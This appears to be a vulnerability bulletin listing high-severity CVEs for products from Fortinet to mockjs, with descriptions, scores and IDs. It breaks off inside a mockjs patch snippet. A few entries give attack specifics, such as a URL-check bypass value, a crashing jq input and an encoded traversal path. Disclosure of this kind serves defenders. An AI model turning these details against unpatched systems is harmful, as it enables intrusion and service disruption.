fortinet -- fortitester	An improper neutralization of special elements used in an OS command vulnerability [CWE-78] in the command line interpreter of FortiTester 2.3.0 through 7.2.3 may allow an authenticated attacker to execute unauthorized commands via specifically crafted arguments when running execute restore/backup .	2023-12-13	7.8	CVE-2023-40716 [email protected]
fortinet -- fortiwlm	A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 allows attacker to execute unauthorized code or commands via specifically crafted http get request parameters	2023-12-13	8.8	CVE-2023-48782 [email protected]
fortinet -- multiple_products	A cross-site request forgery (CSRF) in Fortinet FortiVoiceEnterprise version 6.4.x, 6.0.x, FortiSwitch version 7.0.0 through 7.0.4, 6.4.0 through 6.4.10, 6.2.0 through 6.2.7, 6.0.x, FortiMail version 7.0.0 through 7.0.3, 6.4.0 through 6.4.6, 6.2.x, 6.0.x FortiRecorder version 6.4.0 through 6.4.2, 6.0.x, 2.7.x, 2.6.x, FortiNDR version 1.x.x allows a remote unauthenticated attacker to execute commands on the CLI via tricking an authenticated administrator to execute malicious GET requests.	2023-12-13	8.3	CVE-2022-27488 [email protected]
franklin-electric -- system_sentinel_anyware	Franklin Fueling Systems System Sentinel AnyWare (SSA) version 1.6.24.492 is vulnerable to Session Fixation. The 'sid' parameter in the group_status.asp resource allows an attacker to escalate privileges and obtain sensitive information.	2023-12-08	9.8	CVE-2023-48929 [email protected]
frauscher -- frauscher_diagnostic_system_102	This vulnerability allows an remote attacker with low privileges to misuse Improper Control of Generation of Code ('Code Injection') to gain full control of the affected device.	2023-12-11	8.8	CVE-2023-5500 [email protected]
gitlab -- gitlab	An improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication. Smartcard authentication is an experimental feature and has to be manually enabled by an administrator.	2023-12-15	7.4	CVE-2023-6680 [email protected]
gl-inet -- gl-ar300m_firmware	In GL.iNET GL-AR300M routers with firmware v4.3.7, it is possible to inject arbitrary shell commands through a crafted package name in the package information functionality.	2023-12-12	9.8	CVE-2023-46454 [email protected]
gl-inet -- gl-ar300m_firmware	In GL.iNET GL-AR300M routers with firmware 3.216 it is possible to inject arbitrary shell commands through the OpenVPN client file upload functionality.	2023-12-12	9.8	CVE-2023-46456 [email protected] [email protected]
gl-inet -- gl-ar300m_firmware	In GL.iNET GL-AR300M routers with firmware v4.3.7 it is possible to write arbitrary files through a path traversal attack in the OpenVPN client file upload functionality.	2023-12-12	7.5	CVE-2023-46455 [email protected] [email protected]
glpi -- glpi	GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.11, GLPI inventory endpoint can be used to drive a SQL injection attack. Version 10.0.11 contains a patch for the issue. As a workaround, disable native inventory.	2023-12-13	8.6	CVE-2023-46727 [email protected] [email protected] [email protected]
glpi -- glpi	GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.11, on PHP 7.4 only, the LDAP server configuration form can be used to execute arbitrary code previously uploaded as a GLPI document. Version 10.0.11 contains a patch for the issue.	2023-12-13	7.2	CVE-2023-46726 [email protected] [email protected] [email protected]
google -- android	In dhcp4_SetPDNAddress of dhcp4_Main.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.	2023-12-08	9.8	CVE-2023-48423 [email protected]
google -- android	Bluetooth HID Hosts in BlueZ may permit an unauthenticated Peripheral role HID Device to initiate and establish an encrypted connection, and accept HID keyboard reports, potentially permitting injection of HID messages when no user interaction has occurred in the Central role to authorize such access. An example affected package is bluez 5.64-0ubuntu1 in Ubuntu 22.04LTS. NOTE: in some cases, a CVE-2020-0556 mitigation would have already addressed this Bluetooth HID Hosts issue.	2023-12-08	8.8	CVE-2023-45866 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]
google -- android	In ProtocolNetAcBarringInfo:rotocolNetAcBarringInfo() of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation.	2023-12-08	7.5	CVE-2023-48398 [email protected]
google -- android	In ppcfw_enable of ppcfw.c, there is a possible EoP due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.	2023-12-08	7.8	CVE-2023-48402 [email protected]
google -- android	In sms_DecodeCodedTpMsg of sms_PduCodec.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure if the attacker is able to observe the behavior of the subsequent switch conditional with no additional execution privileges needed. User interaction is not needed for exploitation.	2023-12-08	7.5	CVE-2023-48403 [email protected]
google -- android	In ProtocolMiscCarrierConfigSimInfoIndAdapter of protocolmiscadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.	2023-12-08	7.5	CVE-2023-48404 [email protected]
google -- android	there is a possible DCK won't be deleted after factory reset due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.	2023-12-08	7.8	CVE-2023-48407 [email protected]
google -- android	In gpu_pixel_handle_buffer_liveness_update_ioctl of private/google-modules/gpu/mali_kbase/mali_kbase_core_linux.c, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.	2023-12-08	7.8	CVE-2023-48409 [email protected]
google -- android	In cd_ParseMsg of cd_codec.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.	2023-12-08	7.5	CVE-2023-48410 [email protected]
google -- android	In multiple locations, there is a possible null dereference due to a missing null check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.	2023-12-08	7.5	CVE-2023-48416 [email protected]
google -- android	In gpu_pixel_handle_buffer_liveness_update_ioctl of private/google-modules/gpu/mali_kbase/platform/pixel/pixel_gpu_slc.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.	2023-12-08	7.8	CVE-2023-48421 [email protected]
google -- chrome	Type confusion in V8 in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)	2023-12-14	8.8	CVE-2023-6702 [email protected] [email protected] [email protected]
google -- chrome	Use after free in Blink in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)	2023-12-14	8.8	CVE-2023-6703 [email protected] [email protected] [email protected]
google -- chrome	Use after free in libavif in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted image file. (Chromium security severity: High)	2023-12-14	8.8	CVE-2023-6704 [email protected] [email protected] [email protected]
google -- chrome	Use after free in WebRTC in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)	2023-12-14	8.8	CVE-2023-6705 [email protected] [email protected] [email protected]
google -- chrome	Use after free in FedCM in Google Chrome prior to 120.0.6099.109 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)	2023-12-14	8.8	CVE-2023-6706 [email protected] [email protected] [email protected]
google -- chrome	Use after free in CSS in Google Chrome prior to 120.0.6099.109 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)	2023-12-14	8.8	CVE-2023-6707 [email protected] [email protected] [email protected]
google -- chromecast_firmware	Missing Permission checks resulting in unauthorized access and Manipulation in KeyChainActivity Application	2023-12-11	9.8	CVE-2023-48417 [email protected]
google -- chromecast_firmware	U-Boot shell vulnerability resulting in Privilege escalation in a production device	2023-12-11	9.8	CVE-2023-48424 [email protected]
google -- chromecast_firmware	U-Boot vulnerability resulting in persistent Code Execution	2023-12-11	9.8	CVE-2023-48425 [email protected]
google -- chromecast_firmware	An oversight in BCB handling of reboot reason that allows for persistent code execution	2023-12-11	9.8	CVE-2023-6181 [email protected]
gpac -- gpac	Heap Buffer Overflow vulnerability in GPAC version 2.3-DEV-rev617-g671976fcc-master, allows attackers to execute arbitrary code and cause a denial of service (DoS) via str2ulong class in src/media_tools/avilib.c in gpac/MP4Box.	2023-12-09	9.8	CVE-2023-46932 [email protected]
hanbiro -- groupware	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Hanbiro Hanbiro groupware allows Information Elicitation.This issue affects Hanbiro groupware: from V3.8.79 before V3.8.81.1.	2023-12-13	7.5	CVE-2023-45800 [email protected]
hapifhir -- hl7_fhir_core	The package-decompression feature in HL7 (Health Level 7) FHIR Core Libraries before 5.6.106 allows attackers to copy arbitrary files to certain directories via directory traversal, if an allowed directory name is a substring of the directory name chosen by the attacker. NOTE: this issue exists because of an incomplete fix for CVE-2023-24057.	2023-12-12	7.5	CVE-2023-28465 [email protected] [email protected] [email protected]
hashicorp -- vault	HashiCorp Vault and Vault Enterprise 1.12.0 and newer are vulnerable to a denial of service through memory exhaustion of the host when handling large unauthenticated and authenticated HTTP requests from a client. Vault will attempt to map the request to memory, resulting in the exhaustion of available memory on the host, which may cause Vault to crash. Fixed in Vault 1.15.4, 1.14.8, 1.13.12.	2023-12-08	7.5	CVE-2023-6337 [email protected]
heartcombo -- devise	The Devise gem before 3.5.4 for Ruby mishandles Remember Me cookies for sessions, which may allow an adversary to obtain unauthorized persistent application access.	2023-12-12	7.5	CVE-2015-8314 [email protected] [email protected] [email protected]
hitachi_vantara -- pentaho_data_integration_&_analytics	Hitachi Vantara Pentaho Data Integration & Analytics versions before 9.5.0.1 and 9.3.0.5, including 8.3.x does not restrict JNDI identifiers during the creation of XActions, allowing control of system level data sources.	2023-12-12	8.5	CVE-2023-3517 [email protected]
hrp2000 -- e-hr	A vulnerability, which was classified as critical, has been found in Hongjing e-HR 2020. Affected by this issue is some unknown functionality of the file /w_selfservice/oauthservlet/%2e./.%2e/general/inform/org/loadhistroyorgtree of the component Login Interface. The manipulation of the argument parentid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247358 is the identifier assigned to this vulnerability.	2023-12-10	9.8	CVE-2023-6655 [email protected] [email protected] [email protected]
html-js -- doracms	DoraCMS v2.1.8 was discovered to re-use the same code for verification of valid usernames and passwords. This vulnerability allows attackers to gain access to the application via a bruteforce attack.	2023-12-08	9.8	CVE-2023-49443 [email protected]
huawei -- ar617vw_firmware	An improper access control vulnerability exists in a Huawei datacom product. Attackers can exploit this vulnerability to obtain partial device information.	2023-12-12	7.1	CVE-2022-48615 [email protected]
huawei -- ar617vw_firmware	A Huawei data communication product has a command injection vulnerability. Successful exploitation of this vulnerability may allow attackers to gain higher privileges.	2023-12-12	7.5	CVE-2022-48616 [email protected]
hyland -- alfresco_content_services	An issue was discovered in Hyland Alfresco Community Edition through 7.2.0. By inserting malicious content in the folder.get.html.ftl file, an attacker may perform SSTI (Server-Side Template Injection) attacks, which can leverage FreeMarker exposed objects to bypass restrictions and achieve RCE (Remote Code Execution). NOTE: this issue exists because of an incomplete fix for CVE-2020-12873.	2023-12-11	8.8	CVE-2023-49964 [email protected] [email protected]
ibm -- aix	IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the piodmgrsu command to obtain elevated privileges. IBM X-Force ID: 267964.	2023-12-13	8.4	CVE-2023-45166 [email protected] [email protected]
ibm -- aix	IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the piobe command to escalate privileges or cause a denial of service. IBM X-Force ID: 267968.	2023-12-13	8.4	CVE-2023-45170 [email protected] [email protected]
ibm -- aix	IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a privileged local user to exploit a vulnerability in the qdaemon command to escalate privileges or cause a denial of service. IBM X-Force ID: 267972.	2023-12-13	8.4	CVE-2023-45174 [email protected] [email protected]
ibm -- i_access_client_solutions	IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 is vulnerable to having its key for an encrypted password decoded. By somehow gaining access to the encrypted password, a local attacker could exploit this vulnerability to obtain the password to other systems. IBM X-Force ID: 268265.	2023-12-14	7.4	CVE-2023-45182 [email protected] [email protected]
ibm -- i_access_client_solutions	IBM i Access Client Solutions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.3 could allow an attacker to execute remote code. Due to improper authority checks the attacker could perform operations on the PC under the user's authority. IBM X-Force ID: 268273.	2023-12-14	7.4	CVE-2023-45185 [email protected] [email protected]
ibm -- informix_dynamic_server	IBM Informix Dynamic Server 12.10 and 14.10 onsmsync is vulnerable to a heap buffer overflow, caused by improper bounds checking which could allow an attacker to execute arbitrary code. IBM X-Force ID: 250753.	2023-12-09	7.8	CVE-2023-28523 [email protected] [email protected]
ibm -- storage_virtualize	IBM SAN Volume Controller, IBM Storwize, IBM FlashSystem and IBM Storage Virtualize 8.3 products use default passwords for a privileged user. IBM X-Force ID: 266874.	2023-12-14	7.5	CVE-2023-43042 [email protected] [email protected]
iconics -- iconics_suite	Multiple components of Iconics SCADA Suite are prone to a Phantom DLL loading vulnerability. This issue arises from the applications improperly searching for and loading dynamic link libraries, potentially allowing an attacker to execute malicious code via a DLL with a matching name in an accessible search path. The affected components are: * MMXFax.exe * winfax.dll * MelSim2ComProc.exe * Sim2ComProc.dll * MMXCall_in.exe * libdxxmt.dll * libsrlmt.dll	2023-12-08	7.8	CVE-2023-6061 [email protected]
idemia -- sigma_lite_&lite+	The Parameter Zone Read and Parameter Zone Write command handlers allow performing a Stack buffer overflow. This could potentially lead to a Remote Code execution on the targeted device.	2023-12-15	9.1	CVE-2023-33218 a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia -- sigma_lite_&lite+	The handler of the retrofit validation command doesn't properly check the boundaries when performing certain validation operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device	2023-12-15	9.1	CVE-2023-33219 a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia -- sigma_lite_&lite+	During the retrofit validation process, the firmware doesn't properly check the boundaries while copying some attributes to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device	2023-12-15	9.1	CVE-2023-33220 a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia -- sigma_lite_&lite+	By abusing a design flaw in the firmware upgrade mechanism of the impacted terminal it's possible to cause a permanent denial of service for the terminal. the only way to recover the terminal is by sending back the terminal to the manufacturer	2023-12-15	7.5	CVE-2023-33217 a87f365f-9d39-4848-9b3a-58c7cae69cab
imsurajghosh -- student_information_system	Student Information System v1.0 is vulnerable to an unauthenticated SQL Injection vulnerability on the 'regno' parameter of index.php page, allowing an external attacker to dump all the contents of the database contents and bypass the login control.	2023-12-08	9.8	CVE-2023-5008 [email protected] [email protected]
invisible-island -- ncurse	NCurse v6.4-20230418 was discovered to contain a segmentation fault via the component _nc_wrap_entry().	2023-12-12	7.5	CVE-2023-50495 [email protected] [email protected]
itpison -- omicard_edm	ITPison OMICARD EDM's file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service.	2023-12-15	9.8	CVE-2023-48371 [email protected]
itpison -- omicard_edm	ITPison OMICARD EDM 's SMS-related function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database.	2023-12-15	9.8	CVE-2023-48372 [email protected]
itpison -- omicard_edm	ITPison OMICARD EDM has a path traversal vulnerability within its parameter "FileName" in a specific function. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files.	2023-12-15	7.5	CVE-2023-48373 [email protected]
izybat -- orange_casiers	IzyBat Orange casiers before 20230803_1 allows getEnsemble.php ensemble SQL injection.	2023-12-09	9.1	CVE-2023-50429 [email protected]
jellyfin -- jellyfin	Jellyfin is a system for managing and streaming media. Prior to version 10.8.13, the `/System/MediaEncoder/Path` endpoint executes an arbitrary file using `ProcessStartInfo` via the `ValidateVersion` function. A malicious administrator can setup a network share and supply a UNC path to `/System/MediaEncoder/Path` which points to an executable on the network share, causing Jellyfin server to run the executable in the local context. The endpoint was removed in version 10.8.13.	2023-12-13	7.2	CVE-2023-48702 [email protected] [email protected] [email protected]
jfinalcms_project -- jfinalcms	JFinalCMS 5.0.0 could allow a remote attacker to read files via ../ Directory Traversal in the /common/down/file fileKey parameter.	2023-12-10	7.5	CVE-2023-50449 [email protected]
johannschopplich -- nuxt_api_party	`nuxt-api-party` is an open source module to proxy API requests. nuxt-api-party attempts to check if the user has passed an absolute URL to prevent the aforementioned attack. This has been recently changed to use the regular expression `^https?://`, however this regular expression can be bypassed by an absolute URL with leading whitespace. For example `\nhttps://whatever.com` which has a leading newline. According to the fetch specification, before a fetch is made the URL is normalized. "To normalize a byte sequence potentialValue, remove any leading and trailing HTTP whitespace bytes from potentialValue.". This means the final request will be normalized to `https://whatever.com` bypassing the check and nuxt-api-party will send a request outside of the whitelist. This could allow us to leak credentials or perform Server-Side Request Forgery (SSRF). This vulnerability has been addressed in version 0.22.1. Users are advised to upgrade. Users unable to upgrade should revert to the previous method of detecting absolute URLs.	2023-12-09	7.5	CVE-2023-49799 [email protected] [email protected] [email protected] [email protected] [email protected]
johannschopplich -- nuxt_api_party	`nuxt-api-party` is an open source module to proxy API requests. The library allows the user to send many options directly to `ofetch`. There is no filter on which options are available. We can abuse the retry logic to cause the server to crash from a stack overflow. fetchOptions are obtained directly from the request body. A malicious user can construct a URL known to not fetch successfully, then set the retry attempts to a high value, this will cause a stack overflow as ofetch error handling works recursively resulting in a denial of service. This issue has been addressed in version 0.22.1. Users are advised to upgrade. Users unable to upgrade should limit ofetch options.	2023-12-09	7.5	CVE-2023-49800 [email protected]
jqlang -- jq	decToString in decNumber/decNumber.c in jq 88f01a7 has a one-byte out-of-bounds write via the " []-1.2e-1111111111" input.	2023-12-11	7.5	CVE-2023-49355 [email protected] [email protected] [email protected]
jruby -- jruby-openssl	The jruby-openssl gem before 0.6 for JRuby mishandles SSL certificate validation.	2023-12-12	7.5	CVE-2009-4123 [email protected] [email protected] [email protected] [email protected]
jtekt -- gc-a22w-cw_firmware	Denial-of-service (DoS) vulnerability exists in FTP service of HMI GC-A2 series. If a remote unauthenticated attacker sends a specially crafted packets to specific ports, a denial-of-service (DoS) condition may occur.	2023-12-12	7.5	CVE-2023-41963 [email protected] [email protected]
jtekt -- gc-a22w-cw_firmware	Denial-of-service (DoS) vulnerability exists in commplex-link service of HMI GC-A2 series. If a remote unauthenticated attacker sends a specially crafted packets to specific ports, a denial-of-service (DoS) condition may occur.	2023-12-12	7.5	CVE-2023-49140 [email protected] [email protected]
jtekt -- gc-a22w-cw_firmware	Denial-of-service (DoS) vulnerability exists in rfe service of HMI GC-A2 series. If a remote unauthenticated attacker sends a specially crafted packets to specific ports, a denial-of-service (DoS) condition may occur.	2023-12-12	7.5	CVE-2023-49143 [email protected] [email protected]
jtekt -- gc-a22w-cw_firmware	Denial-of-service (DoS) vulnerability exists in NetBIOS service of HMI GC-A2 series. If a remote unauthenticated attacker sends a specially crafted packets to specific ports, a denial-of-service (DoS) condition may occur.	2023-12-12	7.5	CVE-2023-49713 [email protected] [email protected]
kaifa_technology -- webitr	Kaifa Technology WebITR is an online attendance system, it has a vulnerability in using hard-coded encryption key. An unauthenticated remote attacker can generate valid token parameter and exploit this vulnerability to access system with arbitrary user account, including administrator's account, to execute login account's permissions, and obtain relevant information.	2023-12-15	9.8	CVE-2023-48392 [email protected]
kaifa_technology -- webitr	Kaifa Technology WebITR is an online attendance system, its file uploading function does not restrict upload of file with dangerous type. A remote attacker with regular user privilege can exploit this vulnerability to upload arbitrary files to perform arbitrary command or disrupt service.	2023-12-15	8.8	CVE-2023-48394 [email protected]
kalcaddle -- kodbox	A vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability.	2023-12-16	7.3	CVE-2023-6848 [email protected] [email protected] [email protected] [email protected] [email protected]
kalcaddle -- kodbox	A vulnerability was found in kalcaddle kodbox up to 1.48. It has been rated as critical. Affected by this issue is the function cover of the file plugins/fileThumb/app.php. The manipulation of the argument path leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The patch is identified as 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. VDB-248210 is the identifier assigned to this vulnerability.	2023-12-16	7.3	CVE-2023-6849 [email protected] [email protected] [email protected] [email protected] [email protected]
keycloak -- keycloak	An unconstrained memory consumption vulnerability was discovered in Keycloak. It can be triggered in environments which have millions of offline tokens (> 500,000 users with each having at least 2 saved sessions). If an attacker creates two or more user sessions and then open the "consents" tab of the admin User Interface, the UI attempts to load a huge number of offline client sessions leading to excessive memory and CPU consumption which could potentially crash the entire system.	2023-12-14	7.7	CVE-2023-6563 [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected]
koajs -- cross-origin_resource_sharing_for_koa	@koa/cors npm provides Cross-Origin Resource Sharing (CORS) for koa, a web framework for Node.js. Prior to version 5.0.0, the middleware operates in a way that if an allowed origin is not provided, it will return an `Access-Control-Allow-Origin` header with the value of the origin from the request. This behavior completely disables one of the most crucial elements of browsers - the Same Origin Policy (SOP), this could cause a very serious security threat to the users of this middleware. If such behavior is expected, for instance, when middleware is used exclusively for prototypes and not for production applications, it should be heavily emphasized in the documentation along with an indication of the risks associated with such behavior, as many users may not be aware of it. Version 5.0.0 fixes this vulnerability.	2023-12-11	7.5	CVE-2023-49803 [email protected] [email protected]
labring -- laf	Laf is a cloud development platform. Prior to version 1.0.0-beta.13, the control of LAF app enV is not strict enough, and in certain scenarios of privatization environment, it may lead to sensitive information leakage in secret and configmap. In ES6 syntax, if an obj directly references another obj, the name of the obj itself will be used as the key, and the entire object structure will be integrated intact. When constructing the deployment instance of the app, env was found from the database and directly inserted into the template, resulting in controllability here. Sensitive information in the secret and configmap can be read through the k8s envFrom field. In a privatization environment, when `namespaceConf. fixed` is marked, it may lead to the leakage of sensitive information in the system. As of time of publication, it is unclear whether any patches or workarounds exist.	2023-12-12	8.9	CVE-2023-48225 [email protected] [email protected] [email protected]
libreoffice -- libreoffice	Improper Input Validation vulnerability in GStreamer integration of The Document Foundation LibreOffice allows an attacker to execute arbitrary GStreamer plugins. In affected versions the filename of the embedded video is not sufficiently escaped when passed to GStreamer enabling an attacker to run arbitrary gstreamer plugins depending on what plugins are installed on the target system.	2023-12-11	8.8	CVE-2023-6185 [email protected] [email protected] [email protected]
libreoffice -- libreoffice	Insufficient macro permission validation of The Document Foundation LibreOffice allows an attacker to execute built-in macros without warning. In affected versions LibreOffice supports hyperlinks with macro or similar built-in command targets that can be executed when activated without warning the user.	2023-12-11	8.8	CVE-2023-6186 [email protected] [email protected] [email protected]
linecorp -- line	An issue in studio kent mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.	2023-12-08	8.2	CVE-2023-43305 [email protected]
linux -- kernel	An out-of-bounds read vulnerability was found in smbCalcSize in fs/smb/client/netmisc.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information.	2023-12-08	7.1	CVE-2023-6606 [email protected] [email protected] [email protected]
linux -- kernel	An out-of-bounds read vulnerability was found in smb2_dump_detail in fs/smb/client/smb2ops.c in the Linux Kernel. This issue could allow a local attacker to crash the system or leak internal kernel information.	2023-12-08	7.1	CVE-2023-6610 [email protected] [email protected] [email protected]
mattermost -- mattermost	Mattermost fails to validate if a relative path is passed in /plugins/playbooks/api/v0/telemetry/run/ as a telemetry run ID, allowing an attacker to use a path traversal payload that points to a different endpoint leading to a CSRF attack.	2023-12-12	8.8	CVE-2023-45316 [email protected]
mattermost -- mattermost	Mattermost fails to to check the length when setting the title in a run checklist in Playbooks, allowing an attacker to send a specially crafted request and crash the Playbooks plugin	2023-12-12	7.5	CVE-2023-45847 [email protected]
mattermost -- mattermost	Mattermost fails to validate the type of the "reminder" body request parameter allowing an attacker to crash the Playbook Plugin when updating the status dialog.	2023-12-12	7.5	CVE-2023-49607 [email protected]
mgt-commerce -- cloudpanel	File-Manager in MGT CloudPanel 2.0.0 through 2.3.2 allows the lowest privilege user to achieve OS command injection by changing file ownership and changing file permissions to 4755.	2023-12-08	8.8	CVE-2023-46157 [email protected] [email protected]
microsoft -- azure_connected_machine_agent	Azure Connected Machine Agent Elevation of Privilege Vulnerability	2023-12-12	7.3	CVE-2023-35624 [email protected]
microsoft -- dynamics_365	Microsoft Dynamics 365 Finance and Operations Denial of Service Vulnerability	2023-12-12	7.5	CVE-2023-35621 [email protected]
microsoft -- microsoft_malware_protection_platform	Microsoft Defender Denial of Service Vulnerability	2023-12-12	7.5	CVE-2023-36010 [email protected]
microsoft -- microsoft_power_platform	Microsoft Power Platform Connector Spoofing Vulnerability	2023-12-12	9.6	CVE-2023-36019 [email protected]
microsoft -- windows	Windows DPAPI (Data Protection Application Programming Interface) Spoofing Vulnerability	2023-12-12	7.5	CVE-2023-36004 [email protected]
microsoft -- windows	Windows Telephony Server Elevation of Privilege Vulnerability	2023-12-12	7.5	CVE-2023-36005 [email protected]
microsoft -- windows_10	Windows MSHTML Platform Remote Code Execution Vulnerability	2023-12-12	8.1	CVE-2023-35628 [email protected]
microsoft -- windows_10	Internet Connection Sharing (ICS) Remote Code Execution Vulnerability	2023-12-12	8.8	CVE-2023-35630 [email protected]
microsoft -- windows_10	Microsoft ODBC Driver Remote Code Execution Vulnerability	2023-12-12	8.8	CVE-2023-35639 [email protected]
microsoft -- windows_10	Internet Connection Sharing (ICS) Remote Code Execution Vulnerability	2023-12-12	8.8	CVE-2023-35641 [email protected]
microsoft -- windows_10	Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability	2023-12-12	8.8	CVE-2023-36006 [email protected]
microsoft -- windows_10	Win32k Elevation of Privilege Vulnerability	2023-12-12	7.8	CVE-2023-36011 [email protected]
microsoft -- windows_10_1507	Windows Media Remote Code Execution Vulnerability	2023-12-12	7.8	CVE-2023-21740 [email protected]
microsoft -- windows_10_1507	Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability	2023-12-12	7.8	CVE-2023-35632 [email protected]
microsoft -- windows_10_1507	Windows Kernel Elevation of Privilege Vulnerability	2023-12-12	7.8	CVE-2023-35633 [email protected]
microsoft -- windows_10_1809	Windows Sysmain Service Elevation of Privilege	2023-12-12	7.8	CVE-2023-35644 [email protected]
microsoft -- windows_10_1809	Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability	2023-12-12	7.8	CVE-2023-36696 [email protected]
microsoft -- windows_11	Windows Bluetooth Driver Remote Code Execution Vulnerability	2023-12-12	8.8	CVE-2023-35634 [email protected]
microsoft -- windows_11_21h2	Win32k Elevation of Privilege Vulnerability	2023-12-12	7.8	CVE-2023-35631 [email protected]
microsoft -- windows_11_23h2	Local Security Authority Subsystem Service Elevation of Privilege Vulnerability	2023-12-12	7.8	CVE-2023-36391 [email protected]
microsoft -- windows_server_2008	Windows DNS Spoofing Vulnerability	2023-12-12	7.5	CVE-2023-35622 [email protected]
microsoft -- windows_server_2012	DHCP Server Service Denial of Service Vulnerability	2023-12-12	7.5	CVE-2023-35638 [email protected]
microsoft -- windows_server_2012	DHCP Server Service Information Disclosure Vulnerability	2023-12-12	7.5	CVE-2023-35643 [email protected]
microweber -- microweber	An issue in microweber v.2.0.1 and fixed in v.2.0.4 allows a remote attacker to obtain sensitive information via the HTTP GET method.	2023-12-08	7.5	CVE-2023-48122 [email protected] [email protected]
milboj -- flash_tool	The flash_tool gem through 0.6.0 for Ruby allows command execution via shell metacharacters in the name of a downloaded file.	2023-12-12	9.8	CVE-2013-2513 [email protected] [email protected]
mlflow -- mlflow	Improper Neutralization of Special Elements Used in a Template Engine in GitHub repository mlflow/mlflow prior to 2.9.2.	2023-12-12	8.8	CVE-2023-6709 [email protected] [email protected]
mlflow -- mlflow	Path Traversal in GitHub repository mlflow/mlflow prior to 2.9.2.	2023-12-13	8.8	CVE-2023-6753 [email protected] [email protected]
mockjs -- mock.js	All versions of the package mockjs are vulnerable to Prototype Pollution via the Util.extend function due to missing check if the attribute resolves to the object prototype. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). User controlled inputs inside the extend() method of the Mock.Handler, Mock.Random, Mock.RE.Handler or Mock.Util, will allow an attacker to exploit this vulnerability. Workaround By using a denylist of dangerous attributes, this weakness can be eliminated. Add the following line in the Util.extend function: js js if (["proto", "constructor", "prototype"].includes(name)) continue js // src/mock/handler.js Util.extend = function extend() { var target = arguments[0] \|\| {}, i = 1, length = arguments.length, options, name, src, copy, clone if (length === 1) { target = this i = 0 } for (; i < length; i++) { options = arguments if (!options) continue for (name in options) { if (["proto", "constructor", "prototype"].includes(name)) continue src = target[name] copy = options[name] if (target === copy) continue if (copy === undefined) continue if (Util.isArray(copy) \|\| Util.isObject(copy)) { if (Util.isArray(copy)) clone = src && Util.isArray(src) ? src : [] if (Util.isObject(copy)) clone = src && Util.isObject(src) ? src : 